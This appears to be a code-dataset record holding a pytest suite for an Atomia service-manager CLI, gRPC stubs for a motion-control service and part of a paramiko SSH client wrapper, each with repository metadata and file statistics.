0f28941401d3c042ff928ec38428838a2fa7400f
|
[
"ISC"
] | null | null | null |
atomia_manager/atomia_tests.py
|
stefan-stankovic-atomia/AutomationServerManager
|
0f28941401d3c042ff928ec38428838a2fa7400f
|
[
"ISC"
] | null | null | null |
atomia_manager/atomia_tests.py
|
stefan-stankovic-atomia/AutomationServerManager
|
0f28941401d3c042ff928ec38428838a2fa7400f
|
[
"ISC"
] | null | null | null |
from atomia_entities import AtomiaService
import atomia
import pytest
import urllib2
class ArgumentsMock(object):
def __init__(self, username = None, password = None, url = None, entity = None, action = None, account = None, service = None, parent = None, path = None, servicedata = None, query = None):
self.username = username
self.password = password
self.url = url
self.entity = entity
self.action = action
self.account = account
self.service = service
self.parent = parent
self.path = path
self.servicedata = servicedata
self.query = query
# show service
def test_show_no_service():
mock = ArgumentsMock(entity="service", action = "show")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_non_existing_service_id():
mock = ArgumentsMock(entity="service", action = "show", service = "00000000-0000-0000-0000-000000000000")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_existing_service_id():
mock = ArgumentsMock(entity="service", action = "show", service = "4fe9b823-0020-4e33-abd9-a2de6a1480af", account="101321")
assert isinstance(atomia.main(mock), AtomiaService)
def test_show_non_existing_service_description():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"CsBase\" : {\"foo\" : \"bar\"}} ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_non_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : { \"foo\" : \"bar\" } } ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_show_existing_service_description():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"DomainRegContact\" : {\"Id\" : \"138\"}} ]", account="101321")
assert isinstance(atomia.main(mock), AtomiaService)
def test_show_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "show", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : \"584e20b8-756f-49e4-b426-a58b835a873e\"} ]", account="101321")
assert isinstance(atomia.main(mock), AtomiaService)
# list service
def test_list_no_service():
mock = ArgumentsMock(entity="service", action = "list", account="101321")
assert isinstance(atomia.main(mock), list)
def test_list_non_existing_service_id():
mock = ArgumentsMock(entity="service", action = "list", parent = "00000000-0000-0000-0000-000000000000")
with pytest.raises(Exception):
atomia.main(mock)
def test_list_existing_service_id():
mock = ArgumentsMock(entity="service", action = "list", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", account="101321")
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_list_non_existing_service_description():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : {\"foo\" : \"bar\"}} ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_list_non_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : { \"foo\" : \"bar\" } } ]", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_list_existing_service_description():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsWindowsWebsite\" : {\"Hostname\":\"python43.org\"} } ]", account="101321")
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_list_existing_service_description_2():
mock = ArgumentsMock(entity="service", action = "list", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\" }, {\"CsLinuxWebsite\" : \"584e20b8-756f-49e4-b426-a58b835a873e\"} ]", account="101321")
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
# find service
def test_find_no_service():
mock = ArgumentsMock(entity="service", action = "find", account="101321")
with pytest.raises(atomia.InputError):
atomia.main(mock)
def test_find_non_existing_parent_service_id():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "00000000-0000-0000-0000-000000000000", query = "{ \"name\" : \"CsLinuxWebsite\" }" )
with pytest.raises(Exception):
atomia.main(mock)
def test_find_existing_parent_service_id():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"CsLinuxWebsite\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_existing_parent_service_id_with_relative_path():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"ApacheWebSite\", \"path\" : \"CsLinuxWebsite\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_existing_parent_service_id_with_invalid_relative_path():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"ApacheWebSite\", \"path\" : \"foo\" }" )
with pytest.raises(Exception):
atomia.main(mock)
def test_find_existing_parent_service_id_with_relative_path_and_properties():
mock = ArgumentsMock(entity="service", action = "find", account="101321", parent = "d83805a8-c4a3-4e17-96af-4c9f0c1679d2", query = "{ \"name\" : \"ApacheWebSite\", \"path\" : \"CsLinuxWebsite\", \"properties\" : { \"PhpVersion\" : \"5.2\"} }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_existing_parent_service_locator_with_multiple_parents():
mock = ArgumentsMock(entity="service", action = "find", account="101321", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\"}, {\"CsWindowsWebsite\" : { \"InitEmail\" : \"true\"}}]", query = "{ \"name\" : \"DnsZoneRecord\", \"path\" : \"DnsZone\" }" )
with pytest.raises(Exception):
atomia.main(mock)
def test_find_existing_parent_service_locator():
mock = ArgumentsMock(entity="service", action = "find", account="101321", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\"}, {\"CsWindowsWebsite\" : { \"Hostname\" : \"python44.org\"}}]", query = "{ \"name\" : \"DnsZoneRecord\", \"path\" : \"DnsZone\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_no_parent():
mock = ArgumentsMock(entity="service", action = "find", account="101321", query = "{ \"name\" : \"DnsZoneRecord\", \"path\" : \"CsBase/CsWindowsWebsite/DnsZone\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
def test_find_no_parent_root_service():
mock = ArgumentsMock(entity="service", action = "find", account="101321", query = "{ \"name\" : \"CsBase\" }" )
assert isinstance(atomia.main(mock), list) and len(atomia.main(mock)) > 0
# add service
def test_add_no_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321")
with pytest.raises(atomia.InputError):
atomia.main(mock)
def test_add_missing_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
def test_add_no_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result = atomia.main(mock)
assert isinstance(result, AtomiaService)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result.logical_id)
atomia.main(mock)
def test_add_with_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy46\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
result = atomia.main(mock)
assert isinstance(result, AtomiaService)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_add_with_parent_service_and_invalid_name():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase \", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_add_with_parent_service_and_invalid_property():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseMame\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_add_with_parent_service_and_missing_properties():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\" }")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
# delete service
def test_delete_no_service():
mock = ArgumentsMock(entity="service", action = "delete", account="101321")
with pytest.raises(Exception):
atomia.main(mock)
def test_delete_invalid_service_id():
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = "00000000-0000-0000-0000-000000000000")
with pytest.raises(Exception):
atomia.main(mock)
def test_delete_non_existing_service_locator_path():
mock = ArgumentsMock(entity="service", action = "delete", account="101321", path="[{\"CsBase\" : \"d83805a8-c4a3-4e17-96af-4c9f0c1679d2\"}, {\"CsMySqlDatabase\" : { \"DatabaseName\" : \"python44.org\"}}]")
with pytest.raises(Exception):
atomia.main(mock)
def test_delete_service_id():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
add_result = atomia.main(mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = add_result.logical_id)
assert atomia.main(mock)
def test_delete_service_locator():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
add_result_parent = atomia.main(mock)
if (isinstance(add_result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = add_result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if (isinstance(add_result, AtomiaService)):
delete_mock = ArgumentsMock(entity="service", action = "delete", account="101321", path="[{\"CsDatabase\" : \"" + add_result_parent.logical_id + "\"}, { \"CsMySqlDatabase\" : { \"DatabaseName\" : \"testpy45\"} } ]")
assert atomia.main(delete_mock)
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = add_result_parent.logical_id)
atomia.main(mock)
else:
assert False
else:
assert False
# modify service
def test_modify_no_service():
mock = ArgumentsMock(entity="service", action = "modify", account="101321")
with pytest.raises(atomia.InputError):
atomia.main(mock)
def test_modify_missing_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"Collation\" : \"utf8_unicode_ci\"}}")
with pytest.raises(urllib2.HTTPError):
atomia.main(mock)
def test_modify_with_parent_service():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if isinstance(add_result, AtomiaService):
modify_result = ArgumentsMock(entity="service", action = "modify", account="101321", service = add_result.logical_id, servicedata = "{ \"properties\" : { \"Collation\" : \"utf8_unicode_ci\"}}")
assert isinstance(atomia.main(modify_result), AtomiaService)
else:
assert False
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_modify_with_parent_service_and_invalid_property():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if isinstance(add_result, AtomiaService):
modify_result = ArgumentsMock(entity="service", action = "modify", account="101321", service = add_result.logical_id, servicedata = "{ \"properties\" : { \"Colation\" : \"utf8_unicode_ci\"}}")
with pytest.raises(Exception):
atomia.main(modify_result)
else:
assert False
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
def test_modify_with_parent_service_and_missing_properties():
mock = ArgumentsMock(entity="service", action = "add", account="101321", servicedata = "{ \"name\" : \"CsDatabase\" }")
result_parent = atomia.main(mock)
if (isinstance(result_parent, AtomiaService)):
mock = ArgumentsMock(entity="service", action = "add", account="101321", parent = result_parent.logical_id, servicedata = "{ \"name\" : \"CsMySqlDatabase\", \"properties\" : { \"DatabaseName\" : \"testpy45\", \"CharacterSet\" : \"utf8\", \"Collation\" : \"utf8_general_ci\"}}")
add_result = atomia.main(mock)
if isinstance(add_result, AtomiaService):
modify_result = ArgumentsMock(entity="service", action = "modify", account="101321", service = add_result.logical_id)
with pytest.raises(Exception):
atomia.main(modify_result)
else:
assert False
mock = ArgumentsMock(entity="service", action = "delete", account="101321", service = result_parent.logical_id)
atomia.main(mock)
else:
assert False
| 56.401274
| 289
| 0.659797
| 1,870
| 17,710
| 6.080749
| 0.061497
| 0.063319
| 0.083722
| 0.177293
| 0.910826
| 0.899745
| 0.881717
| 0.857884
| 0.848914
| 0.817958
| 0
| 0.060902
| 0.17205
| 17,710
| 313
| 290
| 56.58147
| 0.714588
| 0.004574
| 0
| 0.563265
| 0
| 0
| 0.1312
| 0.022018
| 0
| 0
| 0
| 0
| 0.122449
| 1
| 0.171429
| false
| 0.008163
| 0.016327
| 0
| 0.191837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee10413220c86229194a1f3df1dea68609b745b2
| 99
|
py
|
Python
|
service/models/common/__init__.py
|
CyberArkForTheCommunity/jobli-backend
|
2309c9ac33993cb89a8e1581630d99b46f8d55aa
|
[
"MIT"
] | null | null | null |
service/models/common/__init__.py
|
CyberArkForTheCommunity/jobli-backend
|
2309c9ac33993cb89a8e1581630d99b46f8d55aa
|
[
"MIT"
] | 1
|
2021-12-23T13:36:43.000Z
|
2021-12-23T13:36:43.000Z
|
service/models/common/__init__.py
|
CyberArkForTheCommunity/jobli-backend
|
2309c9ac33993cb89a8e1581630d99b46f8d55aa
|
[
"MIT"
] | null | null | null |
from service.models.common.address import Address
from service.models.common.answer import Answer
| 24.75
| 49
| 0.848485
| 14
| 99
| 6
| 0.5
| 0.261905
| 0.404762
| 0.547619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 99
| 3
| 50
| 33
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ee1aa7bd1c83dd1089c336b4403b8e87e7875edb
| 8,986
|
py
|
Python
|
instrosetta/interfaces/motion_control/singleaxis_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/motion_control/singleaxis_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/motion_control/singleaxis_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from instrosetta.interfaces.motion_control import singleaxis_pb2 as instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2
class SingleAxisStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ScanDevices = channel.unary_stream(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/ScanDevices',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesResponse.FromString,
)
self.Initialize = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/Initialize',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeResponse.FromString,
)
self.Shutdown = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/Shutdown',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownResponse.FromString,
)
self.HomeMotor = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/HomeMotor',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.HomeMotorRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
self.GetRange = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/GetRange',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetRangeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.StageRange.FromString,
)
self.GetPosition = channel.unary_unary(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/GetPosition',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetPositionRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
self.MoveAbsolute = channel.unary_stream(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/MoveAbsolute',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveAbsoluteRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
self.MoveRelative = channel.unary_stream(
'/instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis/MoveRelative',
request_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveRelativeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.FromString,
)
class SingleAxisServicer(object):
# missing associated documentation comment in .proto file
pass
def ScanDevices(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Initialize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Shutdown(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HomeMotor(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetRange(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetPosition(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MoveAbsolute(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MoveRelative(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SingleAxisServicer_to_server(servicer, server):
rpc_method_handlers = {
'ScanDevices': grpc.unary_stream_rpc_method_handler(
servicer.ScanDevices,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ScanDevicesResponse.SerializeToString,
),
'Initialize': grpc.unary_unary_rpc_method_handler(
servicer.Initialize,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.InitializeResponse.SerializeToString,
),
'Shutdown': grpc.unary_unary_rpc_method_handler(
servicer.Shutdown,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.ShutdownResponse.SerializeToString,
),
'HomeMotor': grpc.unary_unary_rpc_method_handler(
servicer.HomeMotor,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.HomeMotorRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
'GetRange': grpc.unary_unary_rpc_method_handler(
servicer.GetRange,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetRangeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.StageRange.SerializeToString,
),
'GetPosition': grpc.unary_unary_rpc_method_handler(
servicer.GetPosition,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.GetPositionRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
'MoveAbsolute': grpc.unary_stream_rpc_method_handler(
servicer.MoveAbsolute,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveAbsoluteRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
'MoveRelative': grpc.unary_stream_rpc_method_handler(
servicer.MoveRelative,
request_deserializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.MoveRelativeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_motion__control_dot_singleaxis__pb2.Position.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'instrosetta.interfaces.motion_control.singleaxis.v1.SingleAxis', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 54.13253
| 135
| 0.804807
| 929
| 8,986
| 7.302476
| 0.094726
| 0.0824
| 0.116745
| 0.131338
| 0.865566
| 0.865566
| 0.865566
| 0.812058
| 0.812058
| 0.803803
| 0
| 0.005519
| 0.132985
| 8,986
| 165
| 136
| 54.460606
| 0.865229
| 0.075117
| 0
| 0.37594
| 1
| 0
| 0.133301
| 0.079087
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075188
| false
| 0.075188
| 0.015038
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4e4e48198b17912aa75dd1732ddeaf3694f46ac7
| 20,782
|
py
|
Python
|
Devmiko/__init__.py
|
vsantiago113/Devmiko
|
743bb53f8b3d0af4621d86058df4ae6e7f782715
|
[
"MIT"
] | 1
|
2021-02-03T20:20:42.000Z
|
2021-02-03T20:20:42.000Z
|
Devmiko/__init__.py
|
vsantiago113/Devmiko
|
743bb53f8b3d0af4621d86058df4ae6e7f782715
|
[
"MIT"
] | null | null | null |
Devmiko/__init__.py
|
vsantiago113/Devmiko
|
743bb53f8b3d0af4621d86058df4ae6e7f782715
|
[
"MIT"
] | null | null | null |
import paramiko
import time
import re
import warnings
import sys
import logging
from tqdm import tqdm
import socket
warnings.filterwarnings(action='ignore', module='.*paramiko.*')
class DevmikoSSHException(Exception):
pass
class DevmikoAuthenticationException(Exception):
pass
class TqdmWrap(tqdm):
def view_progressbar(self, a, b):
self.total = b
self.update(a - self.n)
def set_debug(filename=None, level='DEBUG'):
logger = logging.getLogger('paramiko')
level = logging.getLevelName(level)
logger.setLevel(level)
fh = logging.FileHandler('paramiko.log' if not filename else filename)
ch = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
return logger
class SSHClient:
def __init__(self, debug=False, filename=None, level='DEBUG'):
self.__conn = None
self.channel = None
self.output = ''
self.default_string = r'(?:\$[\s]?)|(?:>[\s]?)|(?:#[\s]?)$'
self.wait_time = 0.2
self.buffer = 1024
self.max_iterations = 100
self.__password = ''
self.logger = None
self.debug = debug
self.prompt = None
if debug:
self.logger = set_debug(filename, level)
def connect(self, *args, **kwargs):
self.__password = kwargs.get('password', '')
expect_string = kwargs.get('expect_string', self.default_string)
self.__conn = paramiko.SSHClient()
self.__conn.load_system_host_keys()
self.__conn.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
self.__conn.connect(*args, **kwargs)
self.channel = self.__conn.invoke_shell(width=160, height=2048)
self.channel.settimeout(5.0)
except (paramiko.ssh_exception.AuthenticationException,
paramiko.ssh_exception.PartialAuthentication,
paramiko.ssh_exception.BadAuthenticationType,
paramiko.ssh_exception.PasswordRequiredException,
paramiko.ssh_exception.BadHostKeyException) as e:
self.disconnect()
raise DevmikoAuthenticationException(e)
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count = 0
time.sleep(self.wait_time)
self.output += self.channel.recv(self.buffer).decode('UTF-8')
if re.search(expect_string, self.output, flags=re.IGNORECASE | re.MULTILINE):
break
else:
count += 1
time.sleep(self.wait_time)
def disconnect(self):
if self.channel:
self.channel.close()
if self.__conn:
self.__conn.close()
def send_command(self, command='', expect_string=''):
expect_string = self.default_string if not expect_string else expect_string
count = 0
session_output = ''
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.send_ready():
try:
self.channel.sendall(f'{command}\n')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
